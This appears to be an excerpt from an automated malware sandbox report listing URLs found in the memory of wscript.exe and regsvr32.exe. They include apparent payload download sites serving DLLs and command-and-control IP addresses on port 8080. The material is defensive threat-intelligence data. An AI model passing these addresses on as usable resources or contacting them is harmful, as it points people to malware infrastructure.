Source: regsvr32.exe, 00000004.00000002.632774627.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?36fdbbb7baea3
Source: wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ozmeydan.com/cekici/9/
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ozmeydan.com/cekici/9/xM
Source: wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://softwareulike.com/cWIYxWMPkK/
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://softwareulike.com/cWIYxWMPkK/yM
Source: wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405065761.000000000599E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0
Source: wscript.exe, 00000001.00000003.404701229.0000000005980000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404904476.000000000598C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/D
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
Source: regsvr32.exe, 00000004.00000003.631557827.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632847163.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://160.16.142.56:8080/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633048018.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633400839.0000000002CEE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631327134.0000000002CEE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631876075.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://160.16.142.56:8080/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://160.16.142.56:8080/jesecsgigcdk/zfgrij/wjhswvhm/Low
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://160.16.142.56:8080/jesecsgigcdk/zfgrij/wjhswvhm/~
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://163.44.196.120:8080/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://163.44.196.120:8080/a
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633048018.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631876075.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://163.44.196.120:8080/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://164.90.222.65/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000003.631367209.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633048018.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631876075.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://164.90.222.65:443/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.172.199.165:8080/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.172.199.165:8080/&C
Source: regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.172.199.165:8080/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://91.121.146.47:8080/
Source: regsvr32.exe, 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://91.121.146.47:8080/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000003.487960749.0000000000C32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://91.121.146.47:8080/jesecsgigcdk/zfgrij/wjhswvhm/D
Source: wscript.exe, 00000001.00000002.410280537.0000000005950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbvoyage.com/useragreem
Source: wscript.exe, 00000001.00000003.402475133.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400788663.000000000579C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407340344.00000000057BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400134477.000000000578F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410176133.00000000057BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400415831.0000000005797000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400837362.00000000057AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6
Source: wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/
Source: wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404821142.0000000005952000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404992491.0000000005963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404790346.0000000005948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dll
Source: wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402904454.00000000058C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402574325.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404512277.000000000592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403395898.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404263538.000000000591E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllG
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
Source: wscript.exe, 00000001.00000003.406246546.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410615490.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407565832.0000000005A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/
Source: wscript.exe, 00000001.00000003.404512277.000000000592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.000000000578F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406246546.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401168303.000000000583C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396577821.00000000054FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407228406.00000000058EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.00000000055A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405042674.0000000005982000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396577821.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398739448.000000000565D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410280537.0000000005950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410425286.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396205174.00000000054E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399332103.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.000000000555C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403345800.0000000005872000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408199396.00000000058D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398390395.0000000005657000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400913529.0000000005747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404904476.000000000598C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/
Source: wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402904454.00000000058C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402574325.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404512277.000000000592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410280537.0000000005950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403395898.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404790346.0000000005948000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404263538.000000000591E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/:
Source: wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402904454.00000000058C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402574325.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410244672.0000000005935000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404512277.000000000592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403395898.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407529090.0000000005935000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404263538.000000000591E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/o8
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/tM
Source: wscript.exe, 00000001.00000003.406123541.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410685138.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407893232.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org/l
Source: wscript.exe, 00000001.00000003.402475133.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400788663.000000000579C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407340344.00000000057BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400134477.000000000578F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410176133.00000000057BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400415831.0000000005797000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400837362.00000000057AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://penshorn.org:443/admin/Ses8712iGR8du/script.createobject(
Source: wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
Source: wscript.exe, 00000001.00000003.404701229.0000000005980000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404904476.000000000598C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/LE=C:
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
